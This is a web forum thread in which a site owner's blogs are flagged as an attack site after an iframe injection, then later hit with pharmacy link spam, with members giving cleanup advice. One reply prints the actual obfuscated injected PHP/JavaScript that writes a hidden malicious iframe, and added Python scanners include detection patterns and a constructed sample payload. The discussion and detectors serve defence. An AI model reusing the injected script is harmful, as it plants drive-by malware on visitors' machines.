Google quarantined me



nomos
05-11-2009, 02:53 PM
This morning I got an email from Google with the subject line "Malware notification regarding deeptime.net." At first, I thought it was a phishing thing but then when I visited my sites in Firefox I was greeted with the big red "Reported Attack Site!" page. See for yourself: http://www.deeptime.net/blog/

Looking at the diagnostic in Google Webmaster Tools I get the following message which suggests that it's not actually my site at all that's the problem but this davtraff.com. I did a quick search on the domain and found people saying things like "If I catch this davtraff guy I'll punch him in the neck."

Anyway, my site is fucked and I have no idea what to do besides submit it for a review. But if anyone can offer any ideas or help I'd really appreciate it.




What is the current listing status for deeptime.net?
Site is listed as suspicious - visiting this web site may
harm your computer.

Part of this site was listed for suspicious activity 1 time(s)
over the past 90 days.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90
days, 4 page(s) resulted in malicious software being
downloaded and installed without user consent. The last
time Google visited this site was on 2009-11-04, and the
last time suspicious content was found on this site was
on 2009-11-04.

Malicious software is hosted on 1 domain(s), including
davtraff.com/.

This site was hosted on 1 network(s) including AS26347
(DREAMHOST).

Has this site acted as an intermediary resulting in further
distribution of malware?
Over the past 90 days, deeptime.net did not appear to
function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the
past 90 days.

How did this happen?
In some cases, third parties can add malicious code to
legitimate sites, which would cause us to show the
warning message.

droid
05-11-2009, 03:02 PM
I was running some WP blogs in work that got hacked with random links inserted into the text via javascript. This was inserted into each PHP file on the server:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

What version of wordpress are you running? I had to manually remove the offending code and upgrade.

sufi
05-11-2009, 03:03 PM
this happened to some of my webpages, i still am not really sure how - it looked like someone ftped in and added 3 lines of code to all html files, which downloaded some malicious javascripts that google disliked.
i did have to do a lot of find/replace, and change some passwords, but i was rehabilitated with google in a couple of days...

blacklisted by google = :cool:

massrock
05-11-2009, 03:17 PM
Wait, so is it google who've blocked the site or Dreamhost?

sufi
05-11-2009, 03:20 PM
Scan type: Auto-Protect Scan
Event: Security Risk Found!
Risk: Bloodhound.Exploit.193
File: C:\Documents and Settings\!!sufi!!\Local Settings\Temporary Internet Files\Content.IE5\0S5524X9\freeLooks[1].swf
Location: Unknown Storage
Action taken: Clean failed : Quarantine failed : Access denied
Date found: 05 November 2009 15:08:22
nice one!
not sure if i got that off droid's rash C&P or off of deeptime itself
(also never realised ibn sina invented deeptime, just goes to show...)

sufi
05-11-2009, 03:24 PM
code snippet deleted after a report of this thread throwing up a malware warning - nomos
this little nasty is at the bottom of your source code at http://www.deeptime.net/blog/

nomos
05-11-2009, 03:25 PM
thanks guys. so it sounds like a pain in the ass but not the end of the world. i might have some questions later though as i'm still unsure where to start and i have to run out at the moment.


Wait, so is it google who've blocked the site or Dreamhost?
yeah it's google that does the scans and designates 'attack sites.' firefox and safari receive the information and generate warning pages in front of the sites. the only thing that dreamhost has done is repeat the warning to me when i go to my control panel.

nomos
05-11-2009, 03:27 PM
code snippet deleted after a report of this thread throwing up a malware warning - nomos
this little nasty is at the bottom of your source code at http://www.deeptime.net/blog/

thanks a lot sufi. it's not showing up here but you mean the iframe right? how the hell did that get there?

sufi
05-11-2009, 03:31 PM
yeah it won't show up on dissensus as it's in tags, you can see it if you edit my post (altho sometimes you can post up bits of code that will make dissensus gib out cf. that thread of stelfox's)

these clever lot seem to have worked the exploit out, they are so techy techy that it's all over my head
http://jul.rustedlogic.net/newreply.php?id=6934&postid=193852

nomos
05-11-2009, 03:37 PM
thanks again. i'll go through that when i'm home. so far I've found 2 of those iframes


What version of wordpress are you running? I had to manually remove the offending code and upgrade.
I think I'm on 2.5.7. Looks like the same route for me. Riddim.ca got hit with it as well. It's on Joomla rather than WP.

Find and Replace party at mine tonight :cool:

nomos
05-11-2009, 07:25 PM
So it's called an iframe injection attack. A couple of IT friends have sent some tips and links that correspond with what's been said above. Sounds like it's not very serious but dealing with it will take a while - lots of backing up, reinstalling, etc.

Some reading for anyone else who might have to deal with this sort of thing...

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://eisabainyo.net/weblog/2009/04/06/iframe-injection-attack/

I wouldn't be surprised if it came in via my very out-of-date Joomla install then spread to my wordpress blogs. It happened either through a compromised password or a worm on my computer, which I never expect, being on a mac.
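The iframe injection described in this thread (a hidden 1x1 iframe, or a fromCharCode decoder that document.write()s one, appended to every PHP/HTML file) can be found with a plain file scan rather than by eyeballing each page. The following Python is an added example, not code from the thread or from any poster; the heuristics, the sample injected file and the `malware.invalid` domain are constructed here for illustration, and the decoder recovers the plaintext for the shift-style obfuscation only.

```python
"""Scan a document root for hidden iframes and fromCharCode-style injected scripts."""
import re
import sys
from pathlib import Path

# A hidden or 1x1 iframe: the usual carrier for a drive-by download.
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*?(?:\b(?:width|height)\s*=\s*["\']?[01](?=["\'\s>/])'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>',
    re.IGNORECASE | re.DOTALL,
)
# A decoder built on String.fromCharCode that ends in document.write (the shape of
# the one-liner posted earlier in this thread).
CHARCODE_DECODER = re.compile(r"String\.fromCharCode.*?document\.write", re.IGNORECASE | re.DOTALL)
# The per-character shift inside such a decoder, e.g. fromCharCode(n - (2)).
SHIFT = re.compile(r"fromCharCode\s*\(\s*\w+\s*([-+])\s*\(?\s*(\d+)\s*\)?\s*\)")
# The encoded string handed to the decoder via document.write(fn("...")).
PAYLOAD = re.compile(r'document\.write\s*\(\s*\w+\s*\(\s*"((?:[^"\\]|\\.)*)"\s*\)\s*\)')


def decode_shifted(js):
    """Return the text a shift-style fromCharCode decoder would write, or None if not that shape."""
    shift, payload = SHIFT.search(js), PAYLOAD.search(js)
    if not (shift or payload) or shift is None or payload is None:
        return None
    amount = int(shift.group(2))
    delta = -amount if shift.group(1) == "-" else amount
    raw = re.sub(r"\\(.)", r"\1", payload.group(1))  # undo JS string escaping (\" and \\)
    return "".join(chr(ord(c) + delta) for c in raw)


def scan_text(text):
    """Return a list of (finding, detail) tuples for one file's contents."""
    findings = []
    decoded = None
    if CHARCODE_DECODER.search(text):
        decoded = decode_shifted(text)
        findings.append(("charcode-decoder", decoded or "(could not decode payload)"))
    # Look for hidden iframes both in the raw file and in whatever the decoder would emit.
    for candidate in (text, decoded or ""):
        for m in HIDDEN_IFRAME.finditer(candidate):
            findings.append(("hidden-iframe", m.group(0)[:120]))
    return findings


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a document root and map each suspicious file to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                hits = scan_text(path.read_text(errors="replace"))
            except OSError:
                continue
            if hits:
                report[str(path)] = hits
    return report


def _encode_like_the_injector(plain, shift=2):
    """Constructed helper: build a payload the posted decoder shape expects (char+shift, JS-escaped)."""
    shifted = "".join(chr(ord(c) + shift) for c in plain)
    return shifted.replace("\\", "\\\\").replace('"', '\\"')


# Constructed sample: same decoder shape as the injected one-liner, placeholder domain.
PLACEHOLDER_IFRAME = '<iframe src="http://malware.invalid/x.php" width=1 height=1 frameborder=0></iframe>'
SAMPLE_INJECTED_PHP = (
    "<?php echo '<script type=\"text/javascript\">"
    "function count(str){var res = \"\";for(i = 0; i < str.length; ++i) "
    "{ n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; "
    "document.write(count(\"" + _encode_like_the_injector(PLACEHOLDER_IFRAME) + "\"));"
    "</script>';?>"
)
SAMPLE_CLEAN_PHP = "<?php echo '<p>Hello</p>'; ?>"

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for filename, hits in scan_tree(target).items():
        for kind, detail in hits:
            print(f"{filename}: {kind}: {detail}")
```

Run it against a copy of the document root before the find/replace cleanup, and again afterwards to confirm nothing was missed; a legitimate embedded video iframe with normal dimensions is not reported, while a decoder hit shows what the obfuscated script would actually have written into the page.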

Ness Rowlah
06-11-2009, 01:45 AM
>> Temporary Internet Files\Content.IE5

I am not sure, but if I take that as running IE5 then you really live in
the dark ages? There is no excuse for running that (unless you are at work and company policy and all that bollox).

nomos
06-11-2009, 02:07 PM
i worked on this till the wee hours last night and i believe i've cleaned it all up. riddim.ca was obliterated in the process but i still have the data so it'll come back in a while. unfortunately another sub site might be gone for good. anyway, just waiting for the green light from google now.

nomos
15-06-2011, 02:05 AM
NEW PROBLEM :mad:

The other day I Googled an entry on my blog and, in the search results, the page title had been hijacked by "Viagra, Cialis, etc."

It wasn't an iFrame injection attack this time. Instead I found a file called "whois.da" at the root of each of my domains. Had a look inside and it contained hundreds of links to an online pharmacy.

So I changed my FTP passwords. But just now I checked and it's back.

Searching "whois.dat" produces nothing. Anyone have any idea what's going on here? It seems less likely that WordPress is the entry point this time. All of my passwords are supposed to be very strong.

john eden
15-06-2011, 09:20 AM
Sorry to hear that Paul - what else was on the site?

I only ask because mine got hacked last year through the shop - I was using an out of date version of the software because upgrading was such a pain.

All they did was insert fake bank pages, so it was easy to stop.

droid
15-06-2011, 10:44 AM
Do you have any out of date plug-ins or add-ons to the site? A .dat file is basically just a text file. The .dat files are writeable by the server, so typically when some attacker finds a way into your site (usually by exploiting some other out-of-date open source app) they write a little script to trawl over any writeable files in your document root and scrawl all over them with bad stuff. It might be an idea to check if there's any other writable files in there too.
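The check suggested above (which files in the document root the server can write to, and which of them have been scribbled over with link spam) can be done in one pass. The following Python is an added example, not code from the thread or from any poster; it treats world-writable mode bits, recent modification and an unusually high count of `href=` attributes as signals, and the demo tree it builds (including a stand-in `whois.dat` and the `pharmacy.invalid` domain) is constructed for illustration.

```python
"""Audit a web document root for writable files, fresh changes and link-stuffed files."""
import os
import re
import sys
import tempfile
import time
from pathlib import Path

HREF = re.compile(r"href\s*=", re.IGNORECASE)


def audit_tree(root, recent_days=7, link_threshold=50):
    """Return root-relative paths grouped as world_writable, recent and link_heavy."""
    root = Path(root)
    cutoff = time.time() - recent_days * 86400
    found = {"world_writable": [], "recent": [], "link_heavy": []}
    for path in root.rglob("*"):
        rel = str(path.relative_to(root))
        st = path.lstat()
        # Anything with the other-write bit set can be altered by whatever the server runs as.
        if st.st_mode & 0o002:
            found["world_writable"].append(rel)
        if not path.is_file():
            continue
        if st.st_mtime >= cutoff:
            found["recent"].append(rel)
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        # Hundreds of links in one file is the pharmacy-spam signature described above.
        if len(HREF.findall(text)) >= link_threshold:
            found["link_heavy"].append(rel)
    return {key: sorted(paths) for key, paths in found.items()}


def demo_audit():
    """Build a constructed sample document root in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp(prefix="docroot-demo-"))
    index = root / "index.php"
    index.write_text("<?php echo 'hello'; ?>\n")
    index.chmod(0o644)
    old = time.time() - 90 * 86400            # the legitimate file was last touched months ago
    os.utime(index, (old, old))
    spam = root / "whois.dat"                 # constructed stand-in for the file named in the thread
    spam.write_text("".join('<a href="http://pharmacy.invalid/%d">buy</a>\n' % i for i in range(200)))
    spam.chmod(0o666)                         # world-writable, so the server could rewrite it
    uploads = root / "uploads"
    uploads.mkdir()
    uploads.chmod(0o777)                      # a world-writable directory is just as bad
    (uploads / "photo.jpg").write_bytes(b"\xff\xd8\xff")
    (uploads / "photo.jpg").chmod(0o644)
    return audit_tree(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    result = audit_tree(target) if target else demo_audit()
    for key, paths in result.items():
        print(key, paths)
```

Point it at the real document root once the spam file has been removed and the passwords changed; if the file reappears, the `recent` list narrows down when it was written and the `world_writable` list shows which paths a compromised plugin or old install could still be using to do it.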

nomos
15-06-2011, 02:04 PM
I've got several WordPress installs on there. I wondered last night if somehow they might be opening a backdoor, so I deleted the disused ones, updated the rest, and password protected a couple that needn't be publicly accessible. I'll weed out and update my plugins to see if that helps.

Frustrating if WP is the entry point but a little more reassuring than the idea that someone/something keeps cracking these passwords.

Thanks guys. ;) I'll report back.

droid
15-06-2011, 02:11 PM
It may not have been a password crack. If you have old wordpress installs that haven't been updated then hackers can get in using published vulnerabilities, the same goes with plug-ins. If anything I'd say it's unlikely the passwords were hacked. It's almost certainly an out of date plugin or WP install.